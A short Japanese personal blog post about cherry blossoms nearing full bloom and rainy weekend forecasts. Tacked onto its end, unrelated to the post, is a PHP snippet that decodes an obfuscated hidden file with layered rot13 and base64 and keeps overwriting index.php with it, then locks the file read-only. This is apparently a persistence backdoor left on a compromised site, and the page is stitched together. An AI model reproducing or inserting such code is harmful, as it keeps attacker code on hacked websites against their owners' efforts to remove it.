今年は開花してから寒かったから満開はまだまだですね。満開は木曜日か金曜日辺り。
今週末はいい感じだと思われますが、今日のポンでは、日曜から月曜にかけて雨だとか…。
僕の携帯だと曇りです。
今年も雨男かもしれないなー(>人<;)
早く日曜日になんねかな〜っと。
$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } }